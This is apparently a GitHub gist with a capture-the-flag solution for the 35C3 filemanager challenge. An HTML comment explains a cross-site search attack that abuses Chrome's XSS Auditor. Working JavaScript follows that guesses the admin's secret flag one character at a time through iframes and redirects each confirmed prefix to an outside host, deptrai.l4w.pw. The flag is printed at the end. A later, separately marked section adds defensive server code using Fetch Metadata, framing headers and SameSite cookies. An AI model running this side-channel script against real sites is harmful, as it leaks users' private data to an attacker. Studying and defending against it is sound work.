@l4wio l4wio/go.html Secret
Last active Sep 3, 2019

<body>
<!--
Briefly: we know that the flag is stored as a `file` in the admin account. Plus, the flag is in the format: 35C3_***
When we search the content of a file and the searched word exists, a script highlights the found word in yellow with <mark>
For example: https://filemanager.appspot.com/search?q=def
<h1>abc</h1>
<pre>def</pre>
<script>
    (()=>{
      for (let pre of document.getElementsByTagName('pre')) {
        let text = pre.innerHTML;
        let q = 'def';
        let idx = text.indexOf(q);
        pre.innerHTML = `${text.substr(0, idx)}<mark>${q}</mark>${text.substr(idx+q.length)}`;
      }
    })();
</script>
Okay, now let's go to the XSS Auditor part.
Try this in Chrome (yes, we should, since the description says that the admin is using Chrome headless):
view-source:https://filemanager.appspot.com/search?q=def&a=%3Cscript%3E%20%20%20%20%28%28%29%3d%3E%7b%0a%20%20%20%20%20%20for%20%28let%20pre%20of%20document%2egetElementsByTagName%28%27pre%27%29%29%20%7b%0a%20%20%20%20%20%20%20%20let%20text%20%3d%20pre%2einnerHTML%3b
You can see the red alert, which means that XSS Auditor found an XSS vector in our URL (the `a` param) that also appears in the page's content. But in fact it's *NOT XSS*; this is a side effect of the auditor.
The highlighting script is only in the page when the search finds something, so the auditor only fires on a hit. We leverage this mechanism to detect whether there is a search result (guessing the flag) or not.
* To clarify: `a` is just a dummy parameter name; we just want XSS Auditor to see it as an XSS vector.
But how do we do that? XSS Auditor will detect and block the page, and redirect the page to `chrome-error://chromewebdata/` as well.
Now the trick comes in. By reading this post: https://portswigger.net/blog/exposing-intranets-with-reliable-browser-based-port-scanning
I found out it's possible to detect whether the browser redirects to another page.
Yep, and that's all.
We can guess the flag by performing XS-Search that leverages XSS Auditor.
-->
<script>
var URL = 'https://filemanager.appspot.com/search?q={{search}}&a=%3Cscript%3E%20%20%20%20%28%28%29%3d%3E%7b%0a%20%20%20%20%20%20for%20%28let%20pre%20of%20document%2egetElementsByTagName%28%27pre%27%29%29%20%7b%0a%20%20%20%20%20%20%20%20let%20text%20%3d%20pre%2einnerHTML%3b';
var charset = '_abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^`{|}~';
var brute = new URLSearchParams(location.search).get('brute') || '35C3_';
function guess(i){
  var go = brute + charset[i];
  var x = document.createElement('iframe');
  x.name = 'blah';
  var calls = 0;
  x.onload = () => {
    calls++;
    if(calls > 1){
      // A second onload call means the XSS Auditor blocked the page and it was redirected to chrome-error://
      // https://portswigger.net/blog/exposing-intranets-with-reliable-browser-based-port-scanning
      console.log("GO IT ==> ",go);
      location.href = 'http://deptrai.l4w.pw/35c3/go.html?brute='+escape(go);
      x.onload = ()=>{};
    }
    var anchor = document.createElement('a');
    anchor.target = x.name;
    anchor.href = x.src+'#';
    anchor.click();
    anchor = null;
  }
  x.src = URL.replace('{{search}}',go);
  document.body.appendChild(x);
  setTimeout(() =>{
    document.body.removeChild(x);
    guess(i+1);
  },1000);
}
guess(0);
// FLAG: 35C3_xss_auditor_for_the_win
</script>
</body>
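
The probe above only works if the search page loads with the admin's session inside a cross-site iframe and the auditor's block page is observable from outside. As an added example (not part of the original gist or of the challenge's code), here is how a server could refuse that request shape using Fetch Metadata headers, plus the response headers and cookie flags that remove the oracle. The function names, the `session` cookie name and the sample requests are assumptions made for illustration.

```javascript
// Added example. Function names and the sample requests are constructed for illustration.

// Fetch Metadata check for a per-user endpoint such as /search.
function isolationDecision(method, headers) {
  const site = headers['sec-fetch-site'];
  // Older browsers send no Fetch Metadata; rely on the headers and cookie flags below.
  if (site === undefined) return { allow: true, reason: 'no-fetch-metadata' };
  // Same-origin requests and user-initiated loads (typed URL, bookmark) are expected.
  if (site === 'same-origin' || site === 'none') return { allow: true, reason: site };
  // From another site, accept only a top-level GET navigation (a followed link).
  const topLevelNav = method === 'GET' &&
    headers['sec-fetch-mode'] === 'navigate' &&
    headers['sec-fetch-dest'] === 'document';
  if (topLevelNav) return { allow: true, reason: 'top-level-navigation' };
  // Everything else, including a cross-site iframe load, is refused.
  return { allow: false, reason: 'cross-site-' + (headers['sec-fetch-dest'] || 'unknown') };
}

// Response headers that take away the framing and auditor side channel.
function hardeningHeaders() {
  return {
    'X-Frame-Options': 'DENY',                           // no rendering inside a frame
    'Content-Security-Policy': "frame-ancestors 'none'", // same rule, CSP form
    'X-XSS-Protection': '0',                             // auditor off: no block page to observe
    'Vary': 'Sec-Fetch-Site, Sec-Fetch-Mode, Sec-Fetch-Dest',
  };
}

// SameSite=Lax keeps the session cookie off cross-site subframe requests.
// The cookie name "session" is an assumption.
function sessionCookie(value) {
  return `session=${value}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}

function handleSearch(method, headers) {
  const decision = isolationDecision(method, headers);
  return {
    status: decision.allow ? 200 : 403,
    reason: decision.reason,
    headers: hardeningHeaders(),
  };
}

// Constructed requests: a framed load from another site, and the site's own page.
const framedProbe = { 'sec-fetch-site': 'cross-site', 'sec-fetch-mode': 'navigate', 'sec-fetch-dest': 'iframe' };
const ownPage = { 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'navigate', 'sec-fetch-dest': 'document' };
console.log(handleSearch('GET', framedProbe).status, handleSearch('GET', ownPage).status);
```
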
X-Cotang commented Jan 10, 2019

Hic! Pro, could you explain it in more detail?? :)) Hoping for some guidance :v
